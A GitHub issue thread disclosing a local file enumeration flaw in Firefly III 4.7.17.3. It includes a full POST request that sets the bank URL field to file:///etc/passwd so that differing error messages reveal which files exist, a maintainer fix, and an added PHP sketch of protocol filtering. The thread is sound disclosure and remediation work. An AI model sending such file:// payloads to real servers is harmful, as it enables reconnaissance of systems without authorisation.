Local file enumeration vulnerability. #2367

Closed
0x2500 opened this issue Aug 2, 2019 · 2 comments
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).

Comments

0x2500 commented Aug 2, 2019

Bug description
The current version of Firefly III, version 4.7.17.3, is vulnerable to local file enumeration.

Steps to reproduce

  1. Visit import/create/fints
  2. Send this request:

```
POST /import/job/configuration/[unique string here, visit link above to get it] HTTP/1.1
Host: Your-Host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Cookie: ...

_token=[your token]&fints_url=file:///etc/passwd&fints_port=443&fints_bank_code=1&fints_username=1&fints_password=1&apply_rules=1
```

You will be redirected to http://your-host/import/job/configuration/[token], where you can see:

 "An error occurred while trying to connecting to your bank. Please make sure that all the data you entered is correct. Original error message: Bad response with status code 0".

Send the request above again with "fints_url=file:///etc/something-that-do-not-exist"; you will see:

 "An error occurred while trying to connecting to your bank. Please make sure that all the data you entered is correct. Original error message: Failed connection to file:///etc/something-that-do-not-exist: Couldn't open file /etc/something-that-do-not-exist".

  3. The error codes are different, and a malicious attacker can use this to gain information about the local file system, enumerate files and paths, and brute-force the file structure. This issue appears because you use libcurl without proper protocol sanitizing.
@JC5 JC5 added bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release). labels Aug 2, 2019
@JC5 JC5 closed this as completed in e80d616 Aug 2, 2019
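
One way to apply the protocol sanitizing the report asks for, as an added example that is not part of the issue thread and is neither Firefly III's code nor the fix in e80d616. The function names `isAllowedBankUrl` and `fetchFromBank` are hypothetical; the sketch assumes the bank endpoint is always reached over HTTPS and that the caller shows one generic message whenever `null` comes back, so the response no longer differs between an existing and a missing file.

```php
<?php
declare(strict_types=1);

/** Accept only absolute https:// URLs that name a host; file://, gopher:// etc. are rejected. */
function isAllowedBankUrl(string $url): bool
{
    $parts = parse_url(trim($url));
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return strtolower($parts['scheme']) === 'https';
}

/** Returns the response body, or null on any failure. Details go to the server log only. */
function fetchFromBank(string $url, int $port, string $body): ?string
{
    if (!isAllowedBankUrl($url)) {
        error_log('Rejected bank URL: scheme not allowed');
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_PORT            => $port,
        CURLOPT_POST            => true,
        CURLOPT_POSTFIELDS      => $body,
        CURLOPT_RETURNTRANSFER  => true,
        // Second layer: libcurl itself refuses every protocol except HTTPS,
        // both for the first request and for any redirect target.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_TIMEOUT         => 15,
    ]);
    $response = curl_exec($ch);
    if ($response === false) {
        // Never echo curl_error() to the user: its text is what made the enumeration possible.
        error_log('Bank request failed: ' . curl_error($ch));
        return null;
    }
    return $response;
}

// Constructed sample inputs, checked without any network access.
foreach (['https://bank.example/fints', 'file:///etc/passwd', 'FILE:///etc/none'] as $u) {
    printf("%-28s %s\n", $u, isAllowedBankUrl($u) ? 'allowed' : 'rejected');
}
```
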
JC5 commented Aug 2, 2019

Should be fixed, if you could verify I would be grateful.

@JC5 JC5 reopened this Aug 2, 2019
0x2500 commented Aug 2, 2019

Fixed.

@0x2500 0x2500 closed this as completed Aug 2, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jan 19, 2020